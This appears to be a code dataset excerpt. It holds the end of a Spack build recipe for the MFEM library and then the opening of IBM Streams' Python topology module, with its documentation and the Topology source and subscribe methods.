if '+libceed' in spec:
options += ['CEED_OPT=-I%s' % spec['libceed'].prefix.include,
'CEED_LIB=%s' %
ld_flags_from_dirs([spec['libceed'].prefix.lib],
['ceed'])]
if '+umpire' in spec:
options += ['UMPIRE_OPT=-I%s' % spec['umpire'].prefix.include,
'UMPIRE_LIB=%s' %
ld_flags_from_library_list(spec['umpire'].libs)]
timer_ids = {'std': '0', 'posix': '2', 'mac': '4', 'mpi': '6'}
timer = spec.variants['timer'].value
if timer != 'auto':
options += ['MFEM_TIMER_TYPE=%s' % timer_ids[timer]]
if '+conduit' in spec:
conduit = spec['conduit']
headers = HeaderList(find(conduit.prefix.include, 'conduit.hpp',
recursive=True))
conduit_libs = ['libconduit', 'libconduit_relay',
'libconduit_blueprint']
libs = find_libraries(conduit_libs, conduit.prefix.lib,
shared=('+shared' in conduit))
libs += LibraryList(find_system_libraries('libdl'))
if '+hdf5' in conduit:
hdf5 = conduit['hdf5']
headers += find_headers('hdf5', hdf5.prefix.include)
libs += hdf5.libs
##################
# cyrush note:
##################
# spack's HeaderList is applying too much magic, undermining us:
#
# It applies a regex to strip back to the last "include" dir
# in the path. In our case we need to pass the following
# as part of the CONDUIT_OPT flags:
#
# -I<install_path>/include/conduit
#
# I tried several ways to present this path to the HeaderList,
# but the regex always kills the trailing conduit dir
# breaking build.
#
# To resolve the issue, we simply join our own string with
# the headers results (which are important b/c they handle
# hdf5 paths when enabled).
##################
# construct proper include path
conduit_include_path = conduit.prefix.include.conduit
# add this path to the found flags
conduit_opt_flags = "-I{0} {1}".format(conduit_include_path,
headers.cpp_flags)
options += [
'CONDUIT_OPT=%s' % conduit_opt_flags,
'CONDUIT_LIB=%s' % ld_flags_from_library_list(libs)]
make('config', *options, parallel=False)
make('info', parallel=False)
def build(self, spec, prefix):
make('lib')
@run_after('build')
def check_or_test(self):
# Running 'make check' or 'make test' may fail if MFEM_MPIEXEC or
# MFEM_MPIEXEC_NP are not set appropriately.
if not self.run_tests:
# check we can build ex1 (~mpi) or ex1p (+mpi).
make('-C', 'examples', 'ex1p' if ('+mpi' in self.spec) else 'ex1',
parallel=False)
# make('check', parallel=False)
else:
make('all')
make('test', parallel=False)
def install(self, spec, prefix):
make('install', parallel=False)
# TODO: The way the examples and miniapps are being installed is not
# perfect. For example, the makefiles do not work.
install_em = ('+examples' in spec) or ('+miniapps' in spec)
if install_em and ('+shared' in spec):
make('examples/clean', 'miniapps/clean')
# This is a hack to get the examples and miniapps to link with the
# installed shared mfem library:
with working_dir('config'):
os.rename('config.mk', 'config.mk.orig')
copy(str(self.config_mk), 'config.mk')
shutil.copystat('config.mk.orig', 'config.mk')
prefix_share = join_path(prefix, 'share', 'mfem')
if '+examples' in spec:
make('examples')
install_tree('examples', join_path(prefix_share, 'examples'))
if '+miniapps' in spec:
make('miniapps')
install_tree('miniapps', join_path(prefix_share, 'miniapps'))
if install_em:
install_tree('data', join_path(prefix_share, 'data'))
examples_src_dir = 'examples'
examples_data_dir = 'data'
@run_after('install')
def cache_test_sources(self):
"""Copy the example source files after the package is installed to an
install test subdirectory for use during `spack test run`."""
self.cache_extra_test_sources([self.examples_src_dir,
self.examples_data_dir])
def test(self):
test_dir = join_path(
self.test_suite.current_test_cache_dir,
self.examples_src_dir
)
# MFEM has many examples to serve as a suitable smoke check. ex10
# was chosen arbitrarily among the examples that work both with
# MPI and without it
test_exe = 'ex10p' if ('+mpi' in self.spec) else 'ex10'
self.run_test(
'make',
[
'CONFIG_MK={0}/share/mfem/config.mk'.format(self.prefix),
test_exe,
'parallel=False'
],
purpose='test: building {0}'.format(test_exe),
skip_missing=False,
work_dir=test_dir,
)
self.run_test(
'./{0}'.format(test_exe),
[
'--mesh',
'../{0}/beam-quad.mesh'.format(self.examples_data_dir)
],
[],
installed=False,
purpose='test: running {0}'.format(test_exe),
skip_missing=False,
work_dir=test_dir,
)
# this patch is only needed for mfem 4.1, where a few
# released files include byte order marks
@when('@4.1.0')
def patch(self):
# Remove the byte order mark since it messes with some compilers
files_with_bom = [
'fem/gslib.hpp', 'fem/gslib.cpp', 'linalg/hiop.hpp',
'miniapps/gslib/field-diff.cpp', 'miniapps/gslib/findpts.cpp',
'miniapps/gslib/pfindpts.cpp']
bom = '\xef\xbb\xbf' if sys.version_info < (3,) else u'\ufeff'
for f in files_with_bom:
filter_file(bom, '', f)
@property
def suitesparse_components(self):
"""Return the SuiteSparse components needed by MFEM."""
ss_comps = 'umfpack,cholmod,colamd,amd,camd,ccolamd,suitesparseconfig'
if self.spec.satisfies('@3.2:'):
ss_comps = 'klu,btf,' + ss_comps
return ss_comps
@property
def sundials_components(self):
"""Return the SUNDIALS components needed by MFEM."""
spec = self.spec
sun_comps = 'arkode,cvodes,nvecserial,kinsol'
if '+mpi' in spec:
if spec.satisfies('@4.2:'):
sun_comps += ',nvecparallel,nvecmpiplusx'
else:
sun_comps += ',nvecparhyp,nvecparallel'
if '+cuda' in spec and '+cuda' in spec['sundials']:
sun_comps += ',nveccuda'
return sun_comps
@property
def headers(self):
"""Export the main mfem header, mfem.hpp.
"""
hdrs = HeaderList(find(self.prefix.include, 'mfem.hpp',
recursive=False))
return hdrs or None
@property
def libs(self):
"""Export the mfem library file.
"""
libs = find_libraries('libmfem', root=self.prefix.lib,
shared=('+shared' in self.spec), recursive=False)
return libs or None
@property
def config_mk(self):
"""Export the location of the config.mk file.
This property can be accessed using spec['mfem'].package.config_mk
"""
dirs = [self.prefix, self.prefix.share.mfem]
for d in dirs:
f = join_path(d, 'config.mk')
if os.access(f, os.R_OK):
return FileList(f)
return FileList(find(self.prefix, 'config.mk', recursive=True))
@property
def test_mk(self):
"""Export the location of the test.mk file.
This property can be accessed using spec['mfem'].package.test_mk.
In version 3.3.2 and newer, the location of test.mk is also defined
inside config.mk, variable MFEM_TEST_MK.
"""
dirs = [self.prefix, self.prefix.share.mfem]
for d in dirs:
f = join_path(d, 'test.mk')
if os.access(f, os.R_OK):
return FileList(f)
return FileList(find(self.prefix, 'test.mk', recursive=True))
| []
| []
| []
| [] | [] | python | 0 | 0 | |
com.ibm.streamsx.topology/opt/python/packages/streamsx/topology/topology.py | # coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015,2019
"""
Streaming application definition.
********
Overview
********
IBM Streams is an advanced analytic platform that allows user-developed
applications to quickly ingest, analyze and correlate information as it
arrives from thousands of real-time sources.
Streams can handle very high data throughput rates, millions of events
or messages per second.
With this API Python developers can build streaming applications
that can be executed using IBM Streams, including the processing
being distributed across multiple computing resources
(hosts or machines) for scalability.
********
Topology
********
A :py:class:`Topology` declares a graph of *streams* and *operations* against
tuples (data items) on those streams.
After being declared, a Topology is submitted to be compiled into
a Streams application bundle (sab file) and then executed.
The sab file is a self contained bundle that can be executed
in a distributed Streams instance either using the Streaming
Analytics service on IBM Cloud or an on-premise
IBM Streams installation.
The compilation step invokes the Streams compiler to produce a bundle.
This effectively, from a Python point of view, produces a runnable
version of the Python topology that includes application
specific Python C extensions to optimize performance.
The bundle also includes any required Python packages or modules
that were used in the declaration of the application, excluding
ones that are in a directory path containing ``site-packages``.
The Python standard package tool ``pip`` uses a directory structure
including ``site-packages`` when installing packages. Packages installed
with ``pip`` can be included in the bundle with
:py:meth:`~Topology.add_pip_package` when using a build service.
This avoids the requirement to have packages be preinstalled in cloud environments.
Local Python packages and modules containing callables used in transformations
such as :py:meth:`~Stream.map` are copied into the bundle from their
local location. The addition of local packages to the bundle can be controlled
with :py:attr:`Topology.include_packages` and
:py:attr:`Topology.exclude_packages`.
The Streams runtime distributes the application's operations
across the resources available in the instance.
.. note::
`Topology` represents a declaration of a streaming application that
will be executed by a Streams instance as a `job`, either using the Streaming Analytics
service on IBM Cloud or an on-premises distributed instance.
`Topology` does not represent a running application, so an instance of `Stream` class does not contain
the tuples, it is only a declaration of a stream.
.. _stream-desc:
******
Stream
******
A :py:class:`Stream` can be an infinite sequence of tuples, such as a stream for a traffic flow sensor.
Alternatively, a stream can be finite, such as a stream that is created from the contents of a file.
When a streams processing application contains infinite streams, the application runs continuously without ending.
A stream has a schema that defines the type of each tuple on the stream.
The schema for a stream is either:
* :py:const:`~streamsx.topology.schema.CommonSchema.Python` - A tuple may be any Python object. This is the default when the schema is not explicitly or implicitly set.
* :py:const:`~streamsx.topology.schema.CommonSchema.String` - Each tuple is a Unicode string.
* :py:const:`~streamsx.topology.schema.CommonSchema.Binary` - Each tuple is a blob.
* :py:const:`~streamsx.topology.schema.CommonSchema.Json` - Each tuple is a Python dict that can be expressed as a JSON object.
* Structured - A stream that has a structured schema of a ordered list of attributes, with each attribute having a fixed type (e.g. float64 or int32) and a name. The schema of a structured stream is defined using typed named tuple or :py:const:`~streamsx.topology.schema.StreamSchema`.
A stream's schema is implicitly derived from type hints declared for the callable
of the transform that produces it. For example `readings` defined as follows would have a structured schema matching ``SensorReading`` ::
class SensorReading(typing.NamedTuple):
sensor_id: str
ts: int
reading: float
def reading_from_json(value:dict) -> SensorReading:
return SensorReading(value['id'], value['timestamp'], value['reading'])
topo = Topology()
json_readings = topo.source(HttpReadings()).as_json()
readings = json_readings.map(reading_from_json)
Deriving schemas from type hints can be disabled by setting the topology's
``type_checking`` attribute to false, for example this would change `readings`
in the previous example to have generic Python object schema :py:const:`~streamsx.topology.schema.CommonSchema.Python` ::
topo = Topology()
topo.type_checking = False
*****************
Stream processing
*****************
Callables
=========
A stream is processed to produce zero or more transformed streams,
such as filtering a stream to drop unwanted tuples, producing a stream
that only contains the required tuples.
Stream processing is per-tuple based: as each tuple is submitted to a stream, the consuming operators
have their processing logic invoked for that tuple.
A functional operator is declared by methods on :py:class:`Stream` such as :py:meth:`~Stream.map` which
maps the tuples on its input stream to tuples on its output stream. `Stream` uses a functional model
where each stream processing operator is defined in terms of a Python callable that is invoked passing
input tuples and whose return defines what output tuples are submitted for downstream processing.
The Python callable used for functional processing in this API may be:
* A Python lambda function.
* A Python function.
* An instance of a Python callable class.
For example a stream ``words`` containing only string objects can be
processed by a :py:meth:`~Stream.filter` using a lambda function::
# Filter the stream so it only contains words starting with py
pywords = words.filter(lambda word : word.startswith('py'))
When a callable has type hints they are used to:
* define the schema of the resulting transformation, see :ref:`stream-desc`.
* type checking the correctness of the transformation at topology declaration time.
For example if the callable defining the source had type hints that indicated
it was an iterator of ``str`` objects then the schema of the resultant stream
would be :py:const:`~streamsx.topology.schema.CommonSchema.String`. If this
source stream then underwent a :py:meth:`Stream.map` transform with a callable
that had a type hint for its argument, a check is made to ensure
that the type of the argument is compatible with ``str``.
Type hints are maintained through transforms regardless of resultant schema.
For example a transform that has a return type hint of ``int`` defines
the schema as :py:const:`~streamsx.topology.schema.CommonSchema.Python`,
but the type hint is retained even though the schema is generic. Thus an
error is raised at topology declaration time if a downstream transformation
uses a callable with a type hint that is incompatible with being passed an ``int``.
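As an illustrative sketch (the callables here are hypothetical), the retained ``int`` hint
from ``to_length`` means a downstream transform whose callable expects a ``str`` would be
rejected at declaration time::
    def to_length(s: str) -> int:
        return len(s)
    def shout(s: str) -> str:
        return s.upper()
    topo = Topology()
    lengths = topo.source(['a', 'bb']).map(to_length)
    lengths.map(shout)   # rejected: shout expects str but the stream carries int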
How type hints are used is specific to each transformation, such as
:py:meth:`~Topology.source`, :py:meth:`~Stream.map`, :py:meth:`~Stream.filter` etc.
Type checking can be disabled by setting the topology's ``type_checking`` attribute to false.
When a callable is a lambda or defined inline (defined in the main Python script,
a notebook or an interactive session) then a serialized copy of its definition becomes part of the
topology. The supported types of captured globals for these callables are limited to
avoid increasing the size of the application and serialization failures due to non-serializable
objects directly or indirectly referenced from captured globals. The supported types of captured globals
are constants (``int``, ``str``, ``float``, ``bool``, ``bytes``, ``complex``), modules, module attributes (e.g. classes, functions and variables
defined in a module), inline classes and functions. If a lambda or inline callable causes an exception due to unsupported global
capture then moving it to its own module is a solution.
Due to `Python bug 36697 <https://bugs.python.org/issue36697>`_ a lambda or inline callable can
incorrectly capture a global variable. For example an inline class using an attribute ``self.model``
will incorrectly capture the global ``model`` even if the global variable ``model`` is never used within the class.
To workaround this bug use attribute or variable names that do not shadow global variables
(e.g. ``self._model``).
Due to `issue 2336 <https://github.com/IBMStreams/streamsx.topology/issues/2336>`_ an inline class using ``super()`` will cause an ``AttributeError`` at runtime. Workaround is to call the super class's method directly, for example replace this code::
class A(X):
def __init__(self):
super().__init__()
with::
class A(X):
def __init__(self):
X.__init__(self)
or move the class to a module.
Stateful operations
===================
Use of a class instance allows the operation to be stateful by maintaining state in instance
attributes across invocations.
.. note::
    For support with consistent region or checkpointing, instances should ensure that the object's state can be pickled. See https://docs.python.org/3.5/library/pickle.html#handling-stateful-objects
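For example, a callable class might assign a sequence number to each tuple by keeping a
counter in an instance attribute (an illustrative sketch, reusing the ``words`` stream from above)::
    class Sequence(object):
        def __init__(self):
            self._count = 0
        def __call__(self, word):
            self._count += 1
            return (self._count, word)
    numbered = words.map(Sequence())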
Initialization and shutdown
===========================
Execution of a class instance effectively runs in a context manager so that an instance's ``__enter__``
method is called when the processing element containing the instance is initialized
and its ``__exit__`` method called when the processing element is stopped. To take advantage of this
the class must define both ``__enter__`` and ``__exit__`` methods.
.. note::
Since an instance of a class is passed to methods such as
:py:meth:`~Stream.map` ``__init__`` is only called when the topology is `declared`, not at runtime.
Initialization at runtime, such as opening connections, occurs through the ``__enter__`` method.
Example of using ``__enter__`` to create custom metrics::
import streamsx.ec as ec
class Sentiment(object):
def __init__(self):
pass
def __enter__(self):
self.positive_metric = ec.CustomMetric(self, "positiveSentiment")
self.negative_metric = ec.CustomMetric(self, "negativeSentiment")
def __exit__(self, exc_type, exc_value, traceback):
pass
def __call__(self):
pass
When an instance defines a valid ``__exit__`` method then it will be called with an exception when:
* the instance raises an exception during processing of a tuple
* a data conversion exception is raised converting a value to a structured schema tuple or attribute
If ``__exit__`` returns a true value then the exception is suppressed and processing continues, otherwise the enclosing processing element will be terminated.
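For example, an instance might suppress only ``ValueError`` so that a malformed tuple is
dropped while any other error still terminates the processing element (an illustrative sketch)::
    class ParseReading(object):
        def __enter__(self):
            pass
        def __exit__(self, exc_type, exc_value, traceback):
            # A true return suppresses the exception and processing continues.
            return exc_type is ValueError
        def __call__(self, s):
            return float(s)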
Tuple semantics
===============
Python objects on a stream may be passed by reference between callables (e.g. the value returned by a map callable may be passed by reference to a following filter callable). This can only occur when the functions are executing in the same PE (process). If an object is not passed by reference a deep-copy is passed. Streams that cross PE (process) boundaries are always passed by deep-copy.
Thus if a stream is consumed by two map and one filter callables in the same PE they may receive the same object reference that was sent by the upstream callable. If one (or more) callable modifies the passed in reference those changes may be seen by the upstream callable or the other callables. The order of execution of the downstream callables is not defined. One can prevent such potential non-deterministic behavior by one or more of these techniques:
* Passing immutable objects
* Not retaining a reference to an object that will be submitted on a stream
* Not modifying input tuples in a callable
* Using copy/deepcopy when returning a value that will be submitted to a stream.
Applications cannot rely on pass-by reference, it is a performance optimization that can be made in some situations when stream connections are within a PE.
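For example, a map callable that retains the last value it produced can
return a deep copy so that downstream callables never share its mutable
object (a sketch assuming ``dict`` tuples)::

    import copy

    class LastValue(object):
        def __init__(self):
            self.last = None
        def __call__(self, tuple_):
            self.last = tuple_              # retained reference
            return copy.deepcopy(tuple_)    # submit an independent copy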
Application log and trace
=========================
IBM Streams provides application trace and log services which are
accessible through standard Python loggers from the `logging` module.
See :ref:`streams_app_log_trc`.
SPL operators
=============
In addition an application declared by `Topology` can include stream processing defined by SPL primitive or
composite operators. This allows reuse of adapters and analytics provided by IBM Streams,
open source and third-party SPL toolkits.
See :py:mod:`streamsx.spl.op`
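A minimal sketch of invoking an SPL operator as a source (the operator kind
and parameters are illustrative, see :py:mod:`streamsx.spl.op` for the
supported invocation styles)::

    import streamsx.spl.op as op

    topo = Topology()
    beacon = op.Source(topo, 'spl.utility::Beacon',
                       'tuple<uint64 seq>', params={'period': 0.1})
    beacon.seq = beacon.output('IterationCount()')
    s = beacon.stream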
***************
Module contents
***************
"""
__all__ = [ 'Routing', 'SubscribeConnection', 'Topology', 'Stream', 'View', 'PendingStream', 'Window', 'Sink' ]
import streamsx._streams._version
__version__ = streamsx._streams._version.__version__
import copy
import collections
import random
import streamsx._streams._placement as _placement
import streamsx._streams._hints
import streamsx.spl.op
import streamsx.spl.types
import streamsx.spl.spl
import streamsx.topology.graph
import streamsx.topology.schema
import streamsx.topology.functions
import streamsx.topology.runtime
import dill
import types
import base64
import json
import threading
import queue
import sys
import os
import time
import inspect
import logging
import datetime
import pkg_resources
import warnings
from enum import Enum
logger = logging.getLogger('streamsx.topology')
def _source_info():
"""
Get information from the user's code (two frames up)
to leave breadcrumbs for file, line, class and function.
"""
ofi = inspect.getouterframes(inspect.currentframe())[2]
try:
calling_class = ofi[0].f_locals['self'].__class__
except KeyError:
calling_class = None
# Tuple of file,line,calling_class,function_name
return ofi[1], ofi[2], calling_class, ofi[3]
class _SourceLocation(object):
"""
Saved source info to eventually create an SPL
annotation with the info in JSON form.
This object's JSON is put into the JSON as "sourcelocation"
"""
def __init__(self, source_info, method=None):
self.source_info = source_info
self.method = method
def spl_json(self):
sl = {}
sl['file'] = self.source_info[0]
sl['line'] = self.source_info[1]
if self.source_info[2] is not None:
sl['class'] = self.source_info[2].__name__
sl['method'] = self.source_info[3]
if self.method:
sl['api.method'] = self.method
return sl
"""
Determine whether a callable has state that needs to be saved during
checkpointing.
"""
def _determine_statefulness(_callable):
stateful = not inspect.isroutine(_callable)
return stateful
class Routing(Enum):
"""
Defines how tuples are routed to channels in a
parallel region.
A parallel region is started by :py:meth:`~Stream.parallel`
and ended with :py:meth:`~Stream.end_parallel` or :py:meth:`~Stream.for_each`.
"""
BROADCAST=0
"""
Tuples are routed to every channel in the parallel region.
"""
ROUND_ROBIN=1
"""
Tuples are routed to maintain an even distribution of tuples to the channels.
Each tuple is only sent to a single channel.
"""
KEY_PARTITIONED=2
HASH_PARTITIONED=3
"""
Tuples are routed based upon a hash value so that tuples with the same hash
and thus same value are always routed to the same channel. When a hash function is
specified it is passed the tuple and the return value is the hash. When no hash
function is specified then `hash(tuple)` is used.
Each tuple is only sent to a single channel.
.. warning:: A consistent hash function is required to guarantee that a tuple
with the same value is always routed to the same channel. `hash()` is not
consistent in that values of types str, bytes and datetime are “salted”
with an unpredictable random value (Python 3.5). Thus if the processing element is
restarted channel routing for a hash based upon a str, bytes or datetime will change.
In addition code executing in the channels can see a different
hash value to other channels and the execution that routed the tuple due to
being in different processing elements.
"""
class SubscribeConnection(Enum):
"""Connection mode between a subscriber and matching publishers.
.. versionadded:: 1.9
.. seealso:: :py:meth:`~Topology.subscribe`
"""
Direct = 0
"""Direct connection between a subscriber and and matching publishers.
When connected directly a slow subscriber will cause back-pressure
against the publishers, forcing them to slow tuple processing to
the slowest publisher.
"""
Buffered = 1
"""Buffered connection between a subscriber and and matching publishers.
With a buffered connection tuples from publishers are placed in
a single queue owned by the subscriber. This allows a slower
subscriber to handle brief spikes in tuples from publishers.
A subscriber can fully isolate itself from matching publishers
by adding a :py:class:`CongestionPolicy` that drops tuples
when the queue is full. In this case when the subscriber is
not able to keep up with the tuple rate from all matching publishers
it will have a minimal effect on matching publishers.
"""
def spl_json(self):
return streamsx.spl.op.Expression.expression('com.ibm.streamsx.topology.topic::' + self.name).spl_json()
class Topology(object):
"""The Topology class is used to define data sources, and is passed as a parameter when submitting an application. Topology keeps track of all sources, sinks, and transformations within your application.
Submission of a Topology results in a Streams application that has
the name `namespace::name`.
Args:
name(str): Name of the topology. Defaults to a name derived from the calling environment if it can be determined, otherwise a random name.
namespace(str): Namespace of the topology. Defaults to a name derived from the calling environment if it can be determined, otherwise a random name.
Attributes:
include_packages(set[str]): Python package names to be included in the built application. Any package in this list is copied into the bundle and made available at runtime to the Python callables used in the application. By default a ``Topology`` will automatically discover which packages and modules are required to be copied, this field may be used to add additional packages that were not automatically discovered. See also :py:meth:`~Topology.add_pip_package`. Package names in `include_packages` take precedence over package names in `exclude_packages`.
exclude_packages(set[str]): Python top-level package names to be excluded from the built application. Excluding a top-level packages excludes all sub-modules at any level in the package, e.g. `sound` excludes `sound.effects.echo`. Only the top-level package can be defined, e.g. `sound` rather than `sound.filters`. Behavior when adding a module within a package is undefined. When compiling the application using Anaconda this set is pre-loaded with Python packages from the Anaconda pre-loaded set.
type_checking(bool): Set to false to disable type checking, defaults to ``True``.
name_to_runtime_id: Optional callable that returns a runtime identifier for a name. Used to override the default mapping of a name into a runtime identifer. It will be called with `name` and returns a valid SPL identifier or ``None``. If ``None`` is returned then the default mapping for `name` is used. Defaults to ``None`` indicating the default mapping is used. See :py:meth:`Stream.runtime_id <Stream.runtime_id>`.
All declared streams in a `Topology` are available through their name
using ``topology[name]``. The stream's name is defined by :py:meth:`Stream.name` and will differ from the name parameter passed when creating the stream if the application uses duplicate names.
.. versionchanged:: 1.11 Declared streams available through ``topology[name]``.
"""
def __init__(self, name=None, namespace=None, files=None):
if name is None or namespace is None:
# Take the name of the calling function
# If it starts with __ and is in a class then use the class name
# Take the namespace from the class's module if executing from
# a class otherwise use the name
si = _source_info()
if name is None:
name = si[3]
if name.startswith('__'):
if si[2] is not None:
name = si[2].__name__
if namespace is None:
if si[2] is not None:
namespace = si[2].__module__
elif si[0] is not None:
namespace = os.path.splitext(os.path.basename(si[0]))[0]
if namespace.startswith('<ipython-input'):
import streamsx.topology.graph
namespace = streamsx.topology.graph._get_project_name()
if not namespace:
namespace = 'notebook'
if sys.version_info.major == 3:
self.opnamespace = "com.ibm.streamsx.topology.functional.python"
else:
raise ValueError("Python version not supported.")
self._streams = dict()
self.include_packages = set()
self.exclude_packages = set()
self._pip_packages = list()
self._files = dict()
if "Anaconda" in sys.version or 'PROJECT_ID' in os.environ or 'DSX_PROJECT_ID' in os.environ:
import streamsx.topology.condapkgs
self.exclude_packages.update(streamsx.topology.condapkgs._CONDA_PACKAGES)
import streamsx.topology._deppkgs
if 'PROJECT_ID' in os.environ or 'DSX_PROJECT_ID' in os.environ:
self.exclude_packages.update(streamsx.topology._deppkgs._ICP4D_NB_PACKAGES)
self.exclude_packages.update(streamsx.topology._deppkgs._DEP_PACKAGES)
self.graph = streamsx.topology.graph.SPLGraph(self, name, namespace)
self._submission_parameters = dict()
self._checkpoint_period = None
self._consistent_region_config = None
self._has_jcp = False
self.type_checking = True
self.name_to_runtime_id = None
@property
def name(self):
"""
Name of the topology.
Returns:
str: Name of the topology.
"""
return self.graph.name
@property
def namespace(self):
"""
Namespace of the topology.
Returns:
str: Namespace of the topology.
"""
return self.graph.namespace
def __getitem__(self, name):
return self._streams[name]
@property
def streams(self):
"""
Dict of all streams in the topology.
Key is the name of the stream, value is the corresponding :py:obj:`Stream` instance.
The returned value is a shallow copy of current streams
in this topology. This allows callers to iterate over the copy
and perform operations that would add streams.
.. note:: Includes all streams created by composites and any internal streams created by topology.
.. versionadded:: 1.14
"""
return self._streams.copy()
def source(self, func, name=None):
"""
Declare a source stream that introduces tuples into the application.
Typically used to create a stream of tuples from an external source,
such as a sensor or reading from an external system.
Tuples are obtained from an iterator created from the passed iterable,
or from the iterable returned by the passed callable.
Each tuple that is not None from the iterator is present on the returned stream.
Each tuple is a Python object and must be picklable to allow execution of the application
to be distributed across available resources in the Streams instance.
If the iterator's ``__iter__`` or ``__next__`` block then shutdown,
checkpointing or consistent region processing may be delayed.
Having ``__next__`` return ``None`` (no available tuples) or tuples
to submit will allow such processing to proceed.
A shutdown ``threading.Event`` is available through
:py:func:`streamsx.ec.shutdown` which becomes set when a shutdown
of the processing element has been requested. This event may be waited
on to perform a sleep that will terminate upon shutdown.
Args:
func(callable): An iterable or a zero-argument callable that returns an iterable of tuples.
name(str): Name of the stream, defaults to a generated name.
Exceptions raised by ``func`` or its iterator will cause
its processing element to terminate.
If ``func`` is a callable object then it may suppress exceptions
by returning a true value from its ``__exit__`` method.
Suppressing an exception raised by ``func.__iter__`` causes the
source to be empty, no tuples are submitted to the stream.
Suppressing an exception raised by ``__next__`` on the iterator
results in no tuples being submitted for that call to ``__next__``.
Processing continues with calls to ``__next__`` to fetch subsequent tuples.
Returns:
Stream: A stream whose tuples are the result of the iterable obtained from `func`.
.. rubric:: Type hints
Type hints on `func` define the schema of the returned stream,
defaulting to :py:const:`~streamsx.topology.schema.CommonSchema.Python`
if no type hints are present.
For example ``s_sensor`` has a type hint that
defines it as an iterable of ``SensorReading`` instances (typed named tuples).
Thus `readings` has a structured schema matching ``SensorReading`` ::
def s_sensor() -> typing.Iterable[SensorReading] :
...
topo = Topology()
readings = topo.source(s_sensor)
.. rubric:: Simple examples
Finite constant source stream containing two tuples
``Hello`` and ``World``::
topo = Topology()
hw = topo.source(['Hello', 'World'])
Use of builtin `range` to produce a finite source stream
containing 100 `int` tuples from 0 to 99::
topo = Topology()
hw = topo.source(range(100))
Use of `itertools.count` to produce an infinite stream of `int` tuples::
import itertools
topo = Topology()
hw = topo.source(lambda : itertools.count())
Use of `itertools` to produce an infinite stream of tuples
with a constant value and a sequence number::
import itertools
topo = Topology()
hw = topo.source(lambda : zip(itertools.repeat('tick'), itertools.count()))
.. rubric:: External system examples
Typically sources pull data in from external systems, such as files,
REST apis, databases, message systems etc. Such a source will typically
be implemented as a class that when called returns an iterable.
To allow checkpointing of state standard methods ``__enter__``
and ``__exit__`` are implemented to allow creation of runtime
objects that cannot be persisted, for example a file handle.
At checkpoint time state is preserved through standard pickling
using ``__getstate__`` and (optionally) ``__setstate__``.
Stateless source that polls a REST API every ten seconds to
get a JSON object (`dict`) with current time details::
import requests
import time
class RestJsonReader(object):
def __init__(self, url, period):
self.url = url
self.period = period
self.session = None
def __enter__(self):
self.session = requests.Session()
self.session.headers.update({'Accept': 'application/json'})
def __exit__(self, exc_type, exc_value, traceback):
if self.session:
self.session.close()
self.session = None
def __call__(self):
return self
def __iter__(self):
return self
def __next__(self):
time.sleep(self.period)
return self.session.get(self.url).json()
def __getstate__(self):
# Remove the session from the persisted state
return {'url':self.url, 'period':self.period}
def main():
utc_now = 'http://worldclockapi.com/api/json/utc/now'
topo = Topology()
times = topo.source(RestJsonReader(utc_now, 10))
.. warning::
Source functions that use generators are not supported
when checkpointing or within a consistent region. This
is because generators cannot be pickled (even when using `dill`).
.. versionchanged:: 1.14
Type hints are used to define the returned stream schema.
"""
sl = _SourceLocation(_source_info(), "source")
import streamsx.topology.composite
if isinstance(func, streamsx.topology.composite.Source):
return func._add(self, name)
_name = self.graph._requested_name(name, action='source', func=func)
hints = streamsx._streams._hints.schema_iterable(func, self)
if inspect.isroutine(func) or callable(func):
pass
else:
func = streamsx.topology.runtime._IterableInstance(func)
schema = hints.schema if hints else None
# source is always stateful
op = self.graph.addOperator(self.opnamespace+"::Source", func, name=_name, sl=sl, nargs=0)
op._layout(kind='Source', name=op.runtime_id, orig_name=name)
oport = op.addOutputPort(schema=schema, name=_name)
return Stream(self, oport)._make_placeable()._add_hints(hints)
def subscribe(self, topic, schema=streamsx.topology.schema.CommonSchema.Python, name=None, connect=None, buffer_capacity=None, buffer_full_policy=None):
"""
Subscribe to a topic published by other Streams applications.
A Streams application may publish a stream to allow other
Streams applications to subscribe to it. A subscriber matches a
publisher if the topic and schema match.
By default a stream is subscribed as :py:const:`~streamsx.topology.schema.CommonSchema.Python` objects
which connects to streams published to topic by Python Streams applications.
Structured schemas are subscribed to using an instance of
:py:class:`StreamSchema`. A Streams application publishing
structured schema streams may have been implemented in any
programming language supported by Streams.
JSON streams are subscribed to using schema :py:const:`~streamsx.topology.schema.CommonSchema.Json`.
Each tuple on the returned stream will be a Python dictionary
object created by ``json.loads(tuple)``.
A Streams application publishing JSON streams may have been implemented in any programming language
supported by Streams.
String streams are subscribed to using schema :py:const:`~streamsx.topology.schema.CommonSchema.String`.
Each tuple on the returned stream will be a Python string object.
A Streams application publishing string streams may have been implemented in any programming language
supported by Streams.
Subscribers can ensure they do not slow down matching publishers
by using a buffered connection with a buffer full policy
that drops tuples.
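A minimal usage sketch, assuming other applications publish JSON tuples
to topic ``readings``::

    topo = Topology()
    readings = topo.subscribe('readings',
        schema=streamsx.topology.schema.CommonSchema.Json,
        connect=SubscribeConnection.Buffered,
        buffer_capacity=5000)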
Args:
topic(str): Topic to subscribe to.
schema(~streamsx.topology.schema.StreamSchema): schema to subscribe to.
name(str): Name of the subscribed stream, defaults to a generated name.
connect(SubscribeConnection): How subscriber will be connected to matching publishers. Defaults to :py:const:`~SubscribeConnection.Direct` connection.
buffer_capacity(int): Buffer capacity in tuples when `connect` is set to :py:const:`~SubscribeConnection.Buffered`. Defaults to 1000 when `connect` is `Buffered`. Ignored when `connect` is `None` or `Direct`.
buffer_full_policy(~streamsx.types.CongestionPolicy): Policy when a published tuple arrives and the subscriber's buffer is full. Defaults to `Wait` when `connect` is `Buffered`. Ignored when `connect` is `None` or `Direct`.
Returns:
Stream: A stream whose tuples have been published to the topic by other Streams applications.
.. versionchanged:: 1.9 `connect`, `buffer_capacity` and `buffer_full_policy` parameters added.
.. seealso:: :py:class:`SubscribeConnection`
"""
schema = streamsx.topology.schema._normalize(schema)
_name = self.graph._requested_name(name, 'subscribe')
sl = _SourceLocation(_source_info(), "subscribe")
# subscribe is never stateful
op = self.graph.addOperator(kind="com.ibm.streamsx.topology.topic::Subscribe", sl=sl, name=_name, stateful=False)
oport = op.addOutputPort(schema=schema, name=_name)
params = {'topic': topic, 'streamType': schema}
if connect is not None and connect != SubscribeConnection.Direct:
params['connect'] = connect
if buffer_capacity:
params['bufferCapacity'] = int(buffer_capacity)
if buffer_full_policy:
params['bufferFullPolicy'] = buffer_full_policy
op.setParameters(params)
op._layout_group('Subscribe', name if name else _name)
return Stream(self, oport)._make_placeable()
def add_file_dependency(self, path, location):
"""
